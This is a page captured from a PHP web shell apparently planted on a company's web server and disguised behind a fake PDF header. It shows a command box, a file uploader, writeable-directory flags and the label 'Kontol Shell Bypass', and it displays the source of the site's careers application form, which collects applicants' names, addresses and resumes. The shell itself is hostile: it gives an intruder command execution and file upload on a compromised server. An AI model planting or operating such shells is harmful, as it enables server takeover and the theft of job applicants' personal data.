%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/rsplinfra.com/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/rsplinfra.com/application/views/careerdetail.php
<section class="innerpage-slider">
	<div class="innerpage-sliderin2">
		<div class="container-fluid">
         <div class="row">
         <div class="col-md-2">
                	 <div class="heading">
                        <a href="<?= base_url('career') ?>"><i class="fa fa-arrow-left" aria-hidden="true"></i> Back  </a> 
                     </div>
                </div>
                <div class="col-md-8">
                	 <div class="heading">
                         <h2><?=$positionsArray['position_title']?></h2>
                     </div>
                </div>

                <div class="col-md-2">	 
                </div>
         </div>       
         </div>
	</div>          
</section>

<section class="innerpage-contants">
 	<div class="container">
        <div class="row">
       		  
            <div class="col-md-7">
             
            <div class="contants-bottom" style="padding:0;">
            <?=html_entity_decode($positionsArray['position_description'])?>
                    
                </div>
            </div>
            <div class="col-md-5">
            <div class="submit-application">
            <div class="application-form" id="application-form">
                        	<div class="form-list">
                            	<label>Name</label>
                                <input type="text" placeholder="Enter your name" name="name" id="name" autocomplete="off" maxlength='200'>
                            </div>
                            <div class="form-list">
                            	<label>Email ID</label>
                                <input type="text" placeholder="Enter your email id" name="email" autocomplete="off" id="email" maxlength='200'>
                            </div>	
                            <div class="form-list">
                            	<label>Contact No</label>
                                <input type="text" onkeyup="this.value=this.value.replace(/[^\d]/,'')"  autocomplete="off" name="mobile" id="mobile" maxlength="10"  placeholder="Enter your Contact number">
                               
                            </div>	
                             
                            <div class="form-list">
                            	<label>Attach Resume</label>
                                <input type="file" id="file" onchange="return uploadFile();">
						        <input type="hidden" name="resume" id="resume">
                            </div>	
							 <div class="form-list">
                            	<label>Current Address</label>
                                <textarea placeholder="Enter your current address" name="current_address" id="current_address"></textarea>
                            </div>
							 <div class="form-list">
                            	<label>Permanent Address</label>
                                <textarea placeholder="Enter your permanent address" name="permanent_address" id="permanent_address"></textarea>
                            </div>
							 <div class="form-list">
                            	<label>Current/Previous Orgination</label>
                                <input type="text" placeholder="Enter your Current/Previous Orgination" autocomplete="off" name="current_org" id="current_org" maxlength='200'>
                               
                            </div>	
							 <div class="form-list">
                            	<label>Qualification with Specialization</label>
                                <input type="text" placeholder="Enter your Qualification with Specialization" autocomplete="off" name="qualification" id="qualification" maxlength='200'>
                               
                            </div>	
							 <div class="form-list">
                            	<label>Total Years Of Experience</label>
                                <input type="text" placeholder="Enter your total years of experience" autocomplete="off" name="total_exp" id="total_exp" maxlength='180'>
                               
                            </div>
							 <div class="form-list">
                            	<label>Open to relocate</label>
								<select name="relocate" id="relocate">
								<option value=""> Select ..</option>
								<option value='1'>Yes</option>
								<option value='0'>No</option>
								</select>
                             </div>	
							 <div class="form-list">
                            	<label>Notice period</label>
                                <input type="text" placeholder="Enter your notice period" autocomplete="off" name="notice_period" id="notice_period" maxlength='200'>
                             </div>	
							
                            <div class="form-list">
                            	<label>Brief of your current & previous role</label>
                                <textarea placeholder="Brief of your current & previous role" name="message" id="message"></textarea>
                            </div>	
                            <div id="msg_div_register_form"></div> 
							 <input type="hidden" value="<?=$positionsArray['position_title']?>" name="position_description" id="position_description">
                          <button id="submit" value="Submit" name="submit" onclick="return validateregistrationform()" class="button1"> Submit  </button></div>
            </div>
            </div>
        </div>

                
	</div>          
</section>

<script>
    function validateregistrationform() {
		
        var name = $("#name").val();
        var email = $("#email").val();
        var mobile = $("#mobile").val();
        //var business = $("#business").val();
        var resume = $("#resume").val();
        var message = $("#message").val();
        var position_description = $("#position_description").val();
		var notice_period = $("#notice_period").val();
        var relocate = $("#relocate").val();
        var total_exp = $("#total_exp").val();
        var current_address = $("#current_address").val();
        var current_org = $("#current_org").val();
        var permanent_address = $("#permanent_address").val();
        var qualification = $("#qualification").val();
        var submit = $("#submit").val();
        var base_url = $('body').attr('data-base-url');
        var pattern = new RegExp(/^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+)*)|((\x22)((((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(([\x01-\x08\x0b\x0c\x0e-\x1f\x7f]|\x21|[\x23-\x5b]|[\x5d-\x7e]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(\\([\x01-\x09\x0b\x0c\x0d-\x7f]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]))))*(((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(\x22)))@((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?$/i);
        var filter = /^((\+[1-9]{1,4}[ \-]*)|(\([0-9]{2,3}\)[ \-]*)|([0-9]{2,4})[ \-]*)*?[0-9]{3,4}?[ \-]*[0-9]{3,4}?$/;
        $("#msg_div_register_form").html('');
        $('#name').removeClass('has-error');
        $('#email').removeClass('has-error');
        $('#mobile').removeClass('has-error');
        $('#business').removeClass('has-error');
        $('#message').removeClass('has-error');
		
        $('#notice_period').removeClass('has-error');
        $('#relocate').removeClass('has-error');
        $('#total_exp').removeClass('has-error');
        $('#current_address').removeClass('has-error');
        $('#current_org').removeClass('has-error');
        $('#permanent_address').removeClass('has-error');
        $('#qualification').removeClass('has-error');

        var error_flag = 'N';
        
        if($.trim(name)=='') { 
           $('#name').addClass('has-error');
           error_flag = 'Y';
         }
        
         if($.trim(email)=='') { 
         $('#email').addClass('has-error');
         error_flag = 'Y';
          }
        //   if($.trim(business)=='') { 
        //  $('#business').addClass('has-error');
        //  error_flag = 'Y';
        //   }
         if($.trim(mobile)=='') { 
           $('#mobile').addClass('has-error');
           error_flag = 'Y';
         }
         if($.trim(message)=='') { 
           $('#message').addClass('has-error');
           error_flag = 'Y';
         }
      
         if($.trim(notice_period)=='') { 
           $('#notice_period').addClass('has-error');
           error_flag = 'Y';
         }
      
         if($.trim(relocate)=='') { 
           $('#relocate').addClass('has-error');
           error_flag = 'Y';
         }
      
         if($.trim(total_exp)=='') { 
           $('#total_exp').addClass('has-error');
           error_flag = 'Y';
         }
      
         if($.trim(current_address)=='') { 
           $('#current_address').addClass('has-error');
           error_flag = 'Y';
         }
      
         if($.trim(total_exp)=='') { 
           $('#total_exp').addClass('has-error');
           error_flag = 'Y';
         }
      
         if($.trim(relocate)=='') { 
           $('#relocate').addClass('has-error');
           error_flag = 'Y';
         }
      
         if($.trim(notice_period)=='') { 
           $('#notice_period').addClass('has-error');
           error_flag = 'Y';
         }
      
	  
		
         if(error_flag == 'Y') {
           $('#msg_div_register_form').html('<p style="color:#DE334D ;">*Fill up the Mantatory Fields.</p>');
           return false;
         }  else {  
          $.ajax({
              url: '<?= base_url('career/registrationsuccessful') ?>',
              method: 'post',
              data: {name: name,mobile:mobile,email:email,resume:resume,message:message,position_description:position_description,submit:submit,notice_period:notice_period,relocate:relocate,total_exp:total_exp,current_address:current_address,current_org:current_org, permanent_address:permanent_address,qualification:qualification},
              enctype: 'multipart/form-data',
              success: function(response){
                // Add options         
                     $('#message').val('');  
                     $('#mobile').val('');     
                    $("#application-form").find('input:text,select,input:file').val('');
                    $('#msg_div_register_form').html('<p style="color:white;font-size:16px;">Thankyou for contacting US!!!</p>');               
              }
            });
            return true;
         }
      }

      function uploadFile(){
		
        data = new FormData();
        data.append('file', $('#file')[0].files[0]);

        var imgname = $('input[type=file]').val();
        console.log(imgname);
        var size = $('#file')[0].files[0].size;
        var ext = imgname.substr((imgname.lastIndexOf('.') + 1));
        if (size <= 2000000) {
            $.ajax({
                url:  "<?php echo base_url('career/uploadFiles');?>",
                type: "POST",
                data: data,
                enctype: 'multipart/form-data',
                processData: false, // tell jQuery not to process the data
                contentType: false // tell jQuery not to set contentType
            }).done(function(data) {
                if (data == 'FILE_SIZE_ERROR') {

                    $("<span style='color:red;' id='profile_image_error_msg'>Sorry File size exceeding from 2 Mb</span>").insertAfter("#file");
                    setTimeout(function() {
                        $('#profile_image_error_msg').slideUp("slow");
                    }, 6000);
                    return false;

                } else if (data == 'FILE_TYPE_ERROR') {

                    $("<span style='color:red;' id='profile_image_error_msg'>Sorry Only you can uplaod JPEG|JPG|PNG|GIF|PDF|DOCX file type</span>").insertAfter("#file");
                    setTimeout(function() {
                        $('#profile_image_error_msg').slideUp("slow");
                    }, 6000);
                    return false;

                } else {
                    $("#resume").val(data);
                    return false;
                }
            });
        } else {
            alert('Sorry File size exceeding from 2 Mb');
            return false;
        }

        return false;
   }

</script>

Kontol Shell Bypass